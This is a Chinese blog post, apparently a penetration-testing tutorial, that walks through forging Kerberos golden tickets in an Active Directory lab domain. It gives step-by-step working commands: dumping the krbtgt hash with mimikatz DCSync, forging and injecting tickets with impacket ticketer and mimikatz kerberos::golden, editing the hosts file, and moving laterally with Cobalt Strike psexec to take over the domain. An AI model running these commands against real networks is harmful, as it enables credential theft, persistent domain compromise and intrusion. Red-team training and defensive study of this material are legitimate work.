黄金票据~

已于 2024-06-04 17:04:33 修改
阅读量1k 收藏 11
点赞数 11
分类专栏: 内网篇 文章标签: 安全 网络安全
于 2024-06-04 17:04:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y22Lee/article/details/139437942
版权

一. 黄金票据原理

黄金票据一般是伪造的TGT,生成这个TGT,不需要和KDC进行校验,金票可以在本地直接生成,生成的的金票在非域机器和域内机器都可以使用

黄金票据的作用:

可以用来权限维持
可以用来横向移动

二. 利用条件

1. 必须知道KDC密钥分发中心账户krbtgt的hash值(重要)

Krbtgt用户只有在域控上(要知道该用户的hash,必须先要控制域控或者通过远程查询)
在这里插入图片描述

2. 域名

3. 域的SID值

在域中执行whoami /all 域的SID值就是去掉500后面的
在这里插入图片描述

4. 需要伪造的用户

一般都是域管理员(administrator)

三. KRBTGT-Hash值的获取方式

获取KRBTGT的hash值,有两种方式:

控制了域控然后查询
通过dcsync查询
1. 控制域控

控制了域控之后可以通过多种方式查询(可以使用之前介绍的密码抓取技术技术)krbtgt是域用户,不是
域控上的本地用户所以存储不在域控的SAM文件中,而是在ntds文件中

在这里插入图片描述
还有很多办法,这里只演示一种

2. 没有控制域控

如果没有控制域控,可以通过dcsync的技术获取,Dcsync之前域内密码抓取技术中介绍过,使用该技术需要使用如下的用户

Administrators组内的用户
Domain Admins组内的用户
Enterprise Admins组内的用户
域控制器的计算机帐户
域控的Administrator 和 system 也可以

在这里插入图片描述

四. 黄金票据的各种制作方式和使用

黄金票据的制作有多种方式,黄金票据本质上是伪造TGT,既然是伪造所以在任何电脑上都可以伪造,生成的TGT票据就可以打入内存(PTT),从而实现对整个域的控制,接下来我们看一下如何伪造

1、impacket中的工具TICKETER

此工具支持在目标机和本地生成金票
命令:

ticketer -domain-sid sid值 -nthash krbtgt-hash -domain 域名 伪造的用户
ticketer -domain-sid S-1-5-21-3176001243-559812214-128103957 -nthash 42a96a39feedfb08eda775cc208ba3e0 -domain hack.com administrator

在这里插入图片描述
将生成的票据打入到内存中

2. 直接使用mimikatz生成并注入到内存中

和CS中自带功能一样

kerberos::golden /user:administrator /domain:域名 /sid:SID值 /krbtgt:NTLM-HASH /ptt
kerberos::golden /user:administrator /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /krbtgt:42a96a39feedfb08eda775cc208ba3e0 /ptt

后面的PTT如果携带 就会自动注入到内存,如果不带就在本地生成

在这里插入图片描述

五. 域内机器下的黄金票据制作和CS上线

先上线一台域内主机,通过这台主机控制域控(拿下整个域)

第一步:对服务器进行域内信息收集,并且检查自身的权限,如果是管理员权限直接dcsync

mimikatz lsadump::dcsync /domain:hack.com /user:krbtgt

在这里插入图片描述
第二步:获取伪造TGT使用的域SID和域名

whoami /all

在这里插入图片描述
第三步:制作黄金票据的条件都收集全之后,可以使用上面的办法生成黄金票据,也可以使用CS自带的金票制作功能
在这里插入图片描述
此功能生成后直接将票据注入到内存中,我们可以直接访问域内任意主机
在这里插入图片描述
在这里插入图片描述
接下来借助计划任务或者是服务上线CS即可

六. 工作组机器下的黄金票据制作和CS上线

上线一台工作组机器,先ping一下域控,看是否能通信
在这里插入图片描述
我这个是因为处于同一个网段中,但是在某些情况下需要注意:

工作组机器的DNS必须修改成域控的IP(主要是工作组中的机器需要ping通域名)
如果不修改DNS,可以修改本地的HOST文件,将域名执行对应的IP地址
域中的SID值如何获取呢?可以使用LADP协议使用adfind查询(但是必须知道一个域用户)
krbtgt值如如何获取呢?这个就费劲了,需要使用控制了域控,或者域内机器

这里大家肯定有点矛盾,我既然都可以获取krbtgt,我直接使用域中的机器进行PTT就可以了,为什么还要用工作组中的机器(如果域中的机器有杀软呢?Mimikatz不能使用呢,但是这个工作组电脑上没有杀软)掌握更多方式,为了灵活方便

第一步:修改DNS或者HOST文件,如果在不同域的情况下需要修改

echo 192.168.41.10 dc.hack.com >> C:\Windows\System32\drivers\etc\hosts
或者
netsh interface ipv4 add dns 本地连接 192.168.41.10

在这里插入图片描述

第二步:获取krbtgt的hash值

mimikatz lsadump::dcsync /domain:hack.com /user:krbtgt

在这里插入图片描述

第三步:获取伪造TGT使用的域SID和域名

在这里插入图片描述

在这里插入图片描述
第四步:制作金票并注入内存

kerberos::golden /user:administrator /domain:hack.com /sid:S-1-5-21-4004672601-2435621703-3785616059 /krbtgt:42a96a39feedfb08eda775cc208ba3e0

在这里插入图片描述

第五步:CS自带的jump命令上线

jump psexec 192.168.41.10 test1

在这里插入图片描述

Y22Lee
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黄金票据原理制作与利用
G3et的博客
01-14 534
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1107
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
黄金票据的原理和使用
qq_45455136的博客
09-28 1177
krbtgt用户是系统在创建域时自动生成的账号,密码是随机生成的,无法登录主机,是KDC(密钥分发中心)的服务账号。在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的 TGT票据加密使用的TGS(票据授予服务器)密码就是krbtgt用户的NTLM Hash Kerberos中的TGT和CT_SK是AS(认证服务器)返回的,TGT是由krbtgt加密和签名的,krbtgt的NTLM Hash是固定的,CT_SK不会保存在KDC中 得到krbtgt的NTLM Hash就可以伪造
黄金票据制作原理及利用方式
Happy峰
09-23 2619
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
黄金票据的制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 2650
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
攻击者可以创建Golden Ticket(黄金票据)和Silver Ticket(白银票据)来模拟合法的Kerberos票证,以此提升权限。Golden Ticket是伪造的TGT,允许攻击者长时间保持权限;而Silver Ticket则是针对特定服务的伪造TGS...
8~15k,网络安全面试真题.pdf
02-05
8. 介绍下黄金票据、白银票据? 9. Windows、Linux常用漏洞及编号? 10. Windows常用端口? 11. 介绍下反序列化漏洞? 12. 介绍下redis? 13. 怎么做基线检查? 14. 常用的渗透工具? 15. 被动扫描模式是什么? 16. ...
hw面试题,网络安全服务面试题,78页,近三万字,纯手工总结
06-27
7. 黄金票据 8. 白银票据 9. 黄金票据和白银票据的区别 10. passwd和shadow的区别 11. 如何获取内网中机器数量 12. 拿下边界机器如何内网渗透? 13. 内网端口转发失败的原因 14. 常见端口转发工具 .... else 1. ...
20个CobaltStrike实战案例 +插件
12-18
案例 4:Kerberos 认证,伪造黄金票据,用于后门 * 使用 shell klist 命令查看票据 * 使用 Shell 命令伪造黄金票据 * 使用 Kerberos_ticket_purge 命令清除票据 案例 5:DNS 木马通杀 Beacon 原理 * 使用 DNS 上...
蚁景网安渗透测试学习路径图最新.pdf
06-22
* 黄金票据伪造原理 * 黄金票据伪造条件 * 利用步骤 PTT GOP * PTT GOP 简介 * PTT GOP 原理 * PTT GOP 利用 GPOSSP * GPOSSP 简介 * GPOSSP 原理 * GPOSSP 利用 SSP * SSP 简介 * SSP 原理 * SSP 利用 ...
域渗透:黄金票据
ClarkAlbert的博客
10-29 1509
域渗透:黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows域中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 322
亚信安全发布2024年6月威胁态势
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
最新发布
olzorange的博客
07-08 165
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
构建安全稳定的应用:SpringSecurity实用指南
zhugedali_的博客
07-04 665
它涵盖了认证(Authentication)、授权(Authorization)、防止常见的安全攻击等多个方面,适用于各种类型的应用,包括 Web 应用、RESTful 服务、微服务等。- 生成认证对象:认证成功后,创建包含用户信息、角色和权限的 Authentication 对象,并存储在安全上下文中。- 加载用户角色和权限:除了基本的用户信息,还包括用户所拥有的角色和权限。- 认证请求处理:根据配置的认证方式,对用户提交的认证信息进行验证。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1162
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 640
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
内网中黄金票据和白银票据的区别
05-14
在内网中,黄金票据和白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据和白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据的使用应该受到高度的限制和监管,以确保网络的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值